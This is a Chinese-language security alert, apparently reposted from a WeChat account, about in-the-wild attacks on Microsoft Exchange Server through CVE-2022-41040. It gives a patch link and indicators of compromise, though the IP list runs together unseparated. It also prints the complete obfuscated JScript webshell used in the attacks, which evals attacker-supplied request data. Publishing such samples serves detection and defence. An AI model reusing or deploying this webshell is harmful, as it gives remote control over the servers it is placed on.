⌈漏洞预警⌋-微软Exchange Server 特权提升漏洞

admin
admin
admin
140350
文章
117
评论
2022年10月5日15:58:45评论53 views字数 2866阅读9分33秒阅读模式

⌈漏洞预警⌋-微软Exchange Server 特权提升漏洞

据安全公司 GTSC  检测报告,有在野利用的RCE 正在对 Exchange Server 实施大范围攻击,时间最早可追溯到今年8 月份

涉及的软件版本包括:201320162019

此次漏洞CVSS 评分高达 8.8  分,强烈建议有相关资产的尽快升级(微软已于9.30日 发布了针对此漏洞的安全补丁)


官方链接 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040

比较有意思的是这次被抓到的 webshell 竟然是来自 蚁剑 ,编码也是936 ,对应的就是国人常用的 GBK 编码,也就是说这次的攻击很有可能是……,这里是道填空题,请各位自行猜测;此次攻击投入的资源也是相当的大,只跳板机一项就将近20 个。

webshell 脚本如下

<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

IOCs 内容如下

Webshell:    File Name: pxh4HG1v.ashx                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1                Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthpxh4HG1v.ashx
    File Name: RedirSuiteServiceProxy.aspx                Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5                Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthRedirSuiteServiceProxy.aspx
    File Name: RedirSuiteServiceProxy.aspx                Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca                Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthRedirSuiteServiceProxy.aspx
    File Name: Xml.ashx                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1                Path: Xml.ashx
    Filename: errorEE.aspx        SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257        Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherrorEE.aspx
DLL:    File name: Dll.dll    SHA256:      074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82      45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9      9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0      29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3      c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
    File name: 180000000.dll (Dump từ tiến trình Svchost.exe)      SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e
IP:125[.]212[.]220[.]485[.]180[.]61[.]1747[.]242[.]39[.]9261[.]244[.]94[.]8586[.]48[.]6[.]6986[.]48[.]12[.]6494[.]140[.]8[.]4894[.]140[.]8[.]113103[.]9[.]76[.]208103[.]9[.]76[.]211104[.]244[.]79[.]6112[.]118[.]48[.]186122[.]155[.]174[.]188125[.]212[.]241[.]134185[.]220[.]101[.]182194[.]150[.]167[.]88212[.]119[.]34[.]11URL:    hxxp://206[.]188[.]196[.]77:8080/themes.aspx
C2:    137[.]184[.]67[.]33


原文始发于微信公众号(攻防之道):⌈漏洞预警⌋-微软Exchange Server 特权提升漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日15:58:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ⌈漏洞预警⌋-微软Exchange Server 特权提升漏洞http://cn-sec.com/archives/1329802.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息